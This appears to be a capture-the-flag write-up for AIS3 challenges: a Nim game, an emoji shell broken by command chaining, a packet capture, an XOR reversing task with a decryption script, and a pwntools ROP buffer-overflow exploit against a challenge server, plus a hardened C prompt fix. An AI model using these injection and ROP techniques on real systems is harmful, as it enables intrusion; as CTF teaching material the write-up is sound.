# MISC

## Welcome

![image](https://hackmd.io/_uploads/SkkrwlSN0.png)

## Quantum Nim Heist

The classic mathematical game Nim. When two stones are left, press 3 (pressing at random worked).

![image](https://hackmd.io/_uploads/B15SwgBEA.png)

Got the flag.

**Flag = AIS3{Ar3_y0u_a_N1m_ma57er_0r_a_Crypt0_ma57er?}**

## Emoji Console

It looks like a shell. I first tried 🐱⭐.

![image](https://hackmd.io/_uploads/ByfLweHVA.png)

That found the directory holding the flag. Next I used 💿 🚩 to switch into the flag directory. Then, since `;` lets you enter several commands on one line and `|` separates commands, I used 💿 🚩 😓😐 🐱 ⭐ and found this file:

![image](https://hackmd.io/_uploads/HyDIweSN0.png)

Running 💿 🚩 😓😐 💿 🚩 😓😐 🐍 ⭐:

![image](https://hackmd.io/_uploads/BkZPPerEA.png)

**Flag = AIS3{🫵🪡🉐🤙🤙🤙👉👉🚩👈👈}**

## Three Dimensional Secret

Wireshark analysis. Following the challenge's hint, I followed the TCP stream.

![image](https://hackmd.io/_uploads/SJQoveSNR.png)

Found a chunk of G-code.

![image](https://hackmd.io/_uploads/B1ZuPeH40.png)

**FLAG = AIS3{b4dly_tun3d_PriN73r}**

# Reverse

## The Long Print

Threw it straight into IDA.

![image](https://hackmd.io/_uploads/BkLCwlHNC.png)

The flag is secret XOR key. Used gdb to locate the arrays.

![image](https://hackmd.io/_uploads/rksAvlr4C.png)

The address is 0x555555556020.

![image](https://hackmd.io/_uploads/HJyyOerNC.png)

**Exploit**

```python
# secret is stored as pairs: (32-bit word, index into key)
secret = [
    0x454b4146, 0x0000000b, 0x6f6f687b, 0x0000000a,
    0x5f796172, 0x00000002, 0x69727473, 0x00000008,
    0x5f73676e, 0x00000006, 0x615f7369, 0x00000005,
    0x7961776c, 0x00000007, 0x6e615f73, 0x00000004,
    0x6573755f, 0x00000009, 0x5f6c7566, 0x00000000,
    0x6d6d6f63, 0x00000001, 0x7d7a6e61, 0x00000003,
]
key = [
    0x3a011001, 0x4c4c1b0d, 0x3a0b002d, 0x00454f40,
    0x3104321a, 0x3e2d161d, 0x2c120a31, 0x0d3e1103,
    0x0c1a002c, 0x041d1432, 0x1a003100, 0x76180807,
    0x65706f48, 0x756f7920, 0x76616820, 0x6e652065,
]

decrypted_message = ''
for i in range(0, len(secret), 2):
    # XOR the 4-byte secret word with the key word it indexes
    v4 = secret[i] ^ key[secret[i + 1]]
    # Emit the result as four ASCII characters, little-endian
    decrypted_message += chr(v4 & 0xFF)
    decrypted_message += chr((v4 >> 8) & 0xFF)
    decrypted_message += chr((v4 >> 16) & 0xFF)
    decrypted_message += chr((v4 >> 24) & 0xFF)

print("Decrypted:", decrypted_message)
```

# PWN

## Mathter

Connected first to take a look; nothing seemed wrong. Threw it into IDA.

![image](https://hackmd.io/_uploads/HkteOlSEA.png)

The key point is fgets, and the input is only left unchecked on the leave path. Inside the function I also saw:

![image](https://hackmd.io/_uploads/S1gMderNA.png)

Guessed it was a ROP chain challenge, then checked the protections.

![image](https://hackmd.io/_uploads/HJSXdgBVR.png)

Confirmed: ROP chain.

**Exploit**

```python
from pwn import *

host = "chals1.ais3.org"
port = 50001
#AIS3{0mg_k4zm4_mu57_k4zm4_mu57_b3_k1dd1ng_m3_2e89c9}

context.arch = 'amd64'
context.terminal = ["tmux", "splitw", "-h"]

offset = 12            # bytes from the buffer to the saved return address
win1_addr = 0x4018c5
arg = 0xDEADBEEF
win2_addr = 0x401997
_arg = 0xCAFEBABE

elf = ELF('./mathter')
rop = ROP(elf)
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]

payload = b'a' * offset
payload += p64(pop_rdi)
payload += p64(_arg)
payload += p64(win2_addr)

r = remote(host, port)
r.sendlineafter(b"Enter an operation and two numbers (e.g., 1 + 1) : ", b'q')
r.sendlineafter(b"Are you sure you want to leave? [Y/n]", payload)
print(r.recvall())
```
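The bug class behind Mathter is an unchecked read on the leave prompt. The following is an added example, not the challenge's source: a hardened `confirm_leave()` that bounds `fgets()` by the buffer and rejects overlong lines, with a hypothetical 12-byte buffer and a test wrapper built on `fmemopen()`.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define ANSWER_MAX 12   /* hypothetical size of the prompt's stack buffer */

/*
 * Hardened "Are you sure you want to leave? [Y/n]" prompt.
 * Hypothetical reconstruction of the bug class: reading the reply with a
 * length larger than the buffer lets a long reply run over the saved
 * return address. Fix: bound the read by sizeof the buffer, and treat a
 * line that does not fit as an error instead of accepting a prefix.
 *
 * Returns 1 for yes, 0 for no/anything else, -1 for EOF or overlong input.
 */
int confirm_leave(FILE *in) {
    char answer[ANSWER_MAX];

    if (fgets(answer, sizeof answer, in) == NULL)
        return -1;                         /* EOF before any reply */

    if (strchr(answer, '\n') == NULL) {
        int c = fgetc(in);
        if (c != EOF) {
            /* More bytes were pending: the line did not fit. Drain the rest
             * so it cannot be replayed as the next command, then refuse. */
            while (c != EOF && c != '\n')
                c = fgetc(in);
            return -1;
        }
        /* Otherwise the line simply ended at EOF, which is fine. */
    }
    return (answer[0] == 'Y' || answer[0] == 'y') ? 1 : 0;
}

/* Test helper: feed a constructed reply string instead of stdin. */
int confirm_leave_from_string(const char *reply) {
    FILE *in = fmemopen((void *)reply, strlen(reply), "r");
    if (in == NULL)
        return -1;
    int result = confirm_leave(in);
    fclose(in);
    return result;
}

int main(void) {
    printf("Are you sure you want to leave? [Y/n] ");
    fflush(stdout);
    printf("confirm_leave -> %d\n", confirm_leave(stdin));
    return 0;
}
```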